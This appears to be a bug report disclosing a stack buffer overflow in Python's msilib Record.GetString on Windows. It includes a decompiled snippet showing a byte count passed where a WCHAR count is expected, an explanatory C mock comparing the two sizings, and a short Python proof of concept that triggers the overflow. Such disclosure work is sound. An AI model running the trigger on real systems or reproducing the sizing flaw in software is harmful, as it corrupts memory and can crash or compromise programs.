Description
Hello.
There is a stack buffer overflow in the Record object of msilib.
After a brief analysis, I was able to find that the implementation of the Record.GetString method has a stack overflow vulnerability.
It seems to be implemented in the msi.pyd file.
The vulnerable code snippet is below. pcchValueBuf is the buffer-length argument of the MsiRecordGetStringW() API, and szValueBuf is the output buffer; this buffer has 4000 bytes of space on the stack (relative to rsp), which means room for 2000 WCHARs.
I think there is a slight mistake in calculating the buffer size.
Although a WCHAR is 2 bytes, the size passed is still 4000, so a stack buffer overflow can happen.
v3 = PyLong_AsUnsignedLongMask(a2);
if ( v3 == -1 && PyErr_Occurred() )
    return 0i64;
v5 = *(_DWORD *)(a1 + 16);
pcchValueBuf[0] = 4000;
v6 = szValueBuf;
StringW = MsiRecordGetStringW(v5, v3, szValueBuf, pcchValueBuf);
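To make the sizing mistake concrete, here is an added C example; it is not code from CPython, msi.pyd or this report. It assumes a mock of MsiRecordGetStringW that follows the documented in/out contract (pcchValueBuf is a count of WCHARs, not bytes, and ERROR_MORE_DATA is returned with the required length when the buffer is too small). Instead of actually writing past the stack buffer, the mock counts how many WCHARs would have landed beyond it, so the two sizings can be compared safely. The record value (a run of 'd' characters, like the PoC's Target column) is constructed input.

```c
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

typedef uint16_t WCHAR;   /* stand-ins for the Windows types */
typedef uint32_t DWORD;
enum { ERROR_SUCCESS = 0, ERROR_MORE_DATA = 234 };
#define BUF_WCHARS 2000   /* same stack buffer size as in the snippet above */

/* Instrumented stand-in for MsiRecordGetStringW (assumption: models the
 * documented in/out contract). On entry *pcch is the capacity in WCHARs, on
 * return the length copied without the NUL; when the capacity is too small
 * nothing is copied, *pcch receives the required length and ERROR_MORE_DATA
 * is returned. true_cch is the buffer's real size: instead of writing past
 * the end, the mock counts the WCHARs that would have landed there. */
static DWORD mock_MsiRecordGetStringW(const WCHAR *value, size_t value_len,
                                      WCHAR *buf, DWORD *pcch,
                                      size_t true_cch, size_t *overflow_wchars)
{
    *overflow_wchars = 0;
    if ((size_t)*pcch < value_len + 1) {      /* the NUL needs room too */
        *pcch = (DWORD)value_len;
        return ERROR_MORE_DATA;
    }
    for (size_t i = 0; i <= value_len; i++) {
        WCHAR c = (i < value_len) ? value[i] : 0;
        if (i < true_cch)
            buf[i] = c;
        else
            (*overflow_wchars)++;
    }
    *pcch = (DWORD)value_len;
    return ERROR_SUCCESS;
}

typedef struct {
    DWORD status;           /* status of the first (stack-buffer) call */
    size_t overflow_wchars; /* WCHARs the first call would have written past buf */
    size_t result_len;      /* length finally obtained, or 0 on failure */
} fetch_result;

/* Fetch a record value of value_len 'd' characters (constructed input
 * mirroring the PoC). use_byte_count selects the size argument: the byte
 * size of the buffer (the bug) or its element count (the fix). */
fetch_result fetch_value(size_t value_len, int use_byte_count)
{
    WCHAR buf[BUF_WCHARS];
    WCHAR *value = malloc(value_len * sizeof(WCHAR));
    fetch_result r = { ERROR_SUCCESS, 0, 0 };
    if (value == NULL)
        return r;
    for (size_t i = 0; i < value_len; i++)
        value[i] = (WCHAR)'d';

    DWORD cch = use_byte_count ? (DWORD)sizeof(buf)                     /* 4000 */
                               : (DWORD)(sizeof(buf) / sizeof(buf[0])); /* 2000 */
    r.status = mock_MsiRecordGetStringW(value, value_len, buf, &cch,
                                        BUF_WCHARS, &r.overflow_wchars);
    if (r.status == ERROR_SUCCESS) {
        r.result_len = cch;
    } else if (r.status == ERROR_MORE_DATA) {
        /* Correct retry path: heap buffer sized from the required length. */
        WCHAR *big = malloc(((size_t)cch + 1) * sizeof(WCHAR));
        if (big != NULL) {
            size_t ignored;
            DWORD cch2 = cch + 1;
            if (mock_MsiRecordGetStringW(value, value_len, big, &cch2,
                                         (size_t)cch + 1, &ignored) == ERROR_SUCCESS)
                r.result_len = cch2;
            free(big);
        }
    }
    free(value);
    return r;
}

int main(void)
{
    fetch_result bug = fetch_value(2000, 1), fix = fetch_value(2000, 0);
    printf("byte-count sizing:    status=%u overflow=%zu WCHARs\n",
           (unsigned)bug.status, bug.overflow_wchars);
    printf("element-count sizing: status=%u overflow=%zu len=%zu\n",
           (unsigned)fix.status, fix.overflow_wchars, fix.result_len);
    return 0;
}
```

With the PoC's 2000-character value, the byte-count sizing reports success while one WCHAR (the terminating NUL, 2 bytes) falls past the end of the buffer, and longer values overrun by correspondingly more; passing the element count instead makes the first call return ERROR_MORE_DATA, and the heap retry then returns the full value with nothing written out of bounds.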
The test environment is Windows 10 with Python 3.10.6.
This bug can be triggered by the PoC code below.
import msilib
import msilib.schema
database = msilib.init_database('test', msilib.schema, 'testProduct', msilib.gen_uuid(), 'testVersion', 'testManufacturer')
records = [('a',1,'c','d'*2000)]
msilib.add_data(database, 'CustomAction', records)
database.Commit()
database.Close()
database = msilib.OpenDatabase('test', msilib.MSIDBOPEN_READONLY)
view = database.OpenView("select Target from CustomAction where `Action`= 'a'")
view.Execute(None)
record = view.Fetch()
record.GetString(1)
Feel free to ask any questions, and if there is anything I need to know, please let me know.
Best Regards.
Thank you.